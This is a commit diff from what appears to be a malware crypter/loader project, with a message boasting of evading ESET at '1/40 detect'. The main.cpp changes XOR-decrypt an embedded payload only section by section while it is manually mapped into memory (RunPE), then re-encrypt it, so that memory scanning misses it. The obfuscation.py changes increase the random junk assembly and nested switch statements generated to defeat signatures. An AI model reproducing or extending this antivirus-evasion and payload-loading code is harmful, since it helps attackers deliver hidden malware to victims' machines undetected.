only decrypt stuff when using them, 1/40 detect

fuck ESET, i got you ! https://kleenscan.com/scan_result/a58d3cad2abdfbb7a93b77deefd8dff4eed3a88af6e70d405768ed9c87dc8027

DllExecutor.vcxproj

@@ -109,6 +109,7 @@
       <Optimization>Disabled</Optimization>
       <WholeProgramOptimization>false</WholeProgramOptimization>
       <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
+      <RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>
     </ClCompile>
     <Link>
       <SubSystem>Windows</SubSystem>

gui.py

@@ -85,7 +85,7 @@ class Ui_mainWindow(object):
         self.spinBox = QtWidgets.QSpinBox(self.centralwidget)
         self.spinBox.setGeometry(QtCore.QRect(155, 118, 42, 22))
         self.spinBox.setObjectName("spinBox")
-        self.spinBox.setValue(8)
+        self.spinBox.setValue(2)
         self.spinBox.setMinimum(1)
         self.label_3 = QtWidgets.QLabel(self.centralwidget)
         self.label_3.setGeometry(QtCore.QRect(120, 122, 47, 13))
@@ -96,7 +96,7 @@ class Ui_mainWindow(object):
         self.spinBox_2 = QtWidgets.QSpinBox(self.centralwidget)
         self.spinBox_2.setGeometry(QtCore.QRect(155, 138, 42, 22))
         self.spinBox_2.setObjectName("spinBox_2")
-        self.spinBox_2.setValue(3)
+        self.spinBox_2.setValue(8)
         self.spinBox_2.setMinimum(1)
         self.checkBox_3 = QtWidgets.QCheckBox(self.centralwidget)
         self.checkBox_3.setGeometry(QtCore.QRect(20, 140, 91, 16))

main.cpp

@@ -30,6 +30,18 @@ Works with :
 - Doesn't copy headers
 */
 
+void decrypt(const char* key, int offset = 0, int limit = -1) {
+	//START
+    size_t key_size = strlen(key);
+    const int bufferSize = sizeof(sample) / sizeof(sample[0]);
+    if (limit == -1) limit = bufferSize;
+	if (key_size == 0) return;
+    for (int i = offset; i < limit ; i++) {
+        sample[i] ^= key[i%key_size];
+    }
+	//END
+}
+
 // This function will load a DLL from a buffer into the current process.
 // The DLL is expected to be in the PE format.
 //
@@ -48,6 +60,8 @@ HMODULE RunPE(const void* dll_buffer, size_t dll_size, DWORD newBase)
         return NULL;
     }
 
+	decrypt(KEY, 0, 1024); // decrypt only the header
+	
     // Get a pointer to the DOS header.
     const IMAGE_DOS_HEADER* dos_header = static_cast<const IMAGE_DOS_HEADER*>(dll_buffer);
 
@@ -79,7 +93,9 @@ HMODULE RunPE(const void* dll_buffer, size_t dll_size, DWORD newBase)
     // Copy the section data to the allocated memory.
     for (WORD i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i) {
         const IMAGE_SECTION_HEADER* section_header = section_headers + i;
+		decrypt(KEY, section_header->PointerToRawData, section_header->PointerToRawData + section_header->SizeOfRawData); //decrypt section
         memcpy(static_cast<char*>(image_base) + section_header->VirtualAddress, static_cast<const char*>(dll_buffer) + section_header->PointerToRawData, section_header->SizeOfRawData);
+		decrypt(KEY, section_header->PointerToRawData, section_header->PointerToRawData + section_header->SizeOfRawData); //encrypt back section
 	}
     
     DEBUG_PRINTF("[+] Wrote section data\n");
@@ -217,16 +233,6 @@ HMODULE RunPE(const void* dll_buffer, size_t dll_size, DWORD newBase)
 	//END
 }
 
-void decrypt(const char* key) {
-	//START
-    size_t key_size = strlen(key);
-	if (key_size == 0) return;
-    for (int i = 0; i < sizeof(sample) / sizeof(sample[0]); i++) {
-        sample[i] ^= key[i%key_size];
-    }
-	//END
-}
-
 void allo() {
 	//START
     AllocConsole();
@@ -252,7 +258,6 @@ int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR     lpCm
     // Load the DLL from a buffer in memory
     const int bufferSize = sizeof(sample) / sizeof(sample[0]);
 	
-    decrypt(KEY);
     HMODULE dll = RunPE(sample, bufferSize, NEW_ADDRESS);
     if (dll == NULL) {
         DEBUG_PRINTF("[-] Failed to load DLL\n");

obfuscation.py

@@ -81,7 +81,7 @@ def GetAsmBlock(branch1, branch2, var, end, sub) :
 	"""+branch1+""":"""
     
     
-    if GetRandomRange(0, 4) > 2 :
+    if GetRandomRange(0, 4) > 1 :
         branch1 = GetRandomString(20)
         branch2_ = GetRandomString(20)
         asm_block += GetAsmBlock(branch1, branch2_, var, end, sub)
@@ -102,7 +102,7 @@ def GetRandomAssemblyBlock() :
 
     r = """const char* """+var+""" = \""""+GetRandomString(5)+"""\";\n__asm {"""
     
-    for i in range(GetRandomRange(0, 15)) :
+    for i in range(GetRandomRange(0, 30)) :
         branch1 = GetRandomString(20)
         branch2 = GetRandomString(20)
         end = GetRandomString(20)
@@ -115,11 +115,11 @@ def generate_switch_statement(variable_name, exit_value, depth=0):
     indent = "    " * depth
     switch_code = f"{indent}switch ({variable_name}) {{\n"
 
-    num_cases = GetRandomRange(1, 4)
+    num_cases = GetRandomRange(2, 5)
     for _ in range(num_cases):
         case_value = GetRandomRange(1, 10**6)
         switch_code += f"{indent}  case {case_value}:\n"
-        if depth < 2 and GetRandomRange(0, 4) > 2 :
+        if depth < 2 and GetRandomRange(0, 4) > 1 :
             switch_code += generate_switch_statement(variable_name, exit_value, depth + 1)
         else:
             switch_code += f"{indent}    {{\n"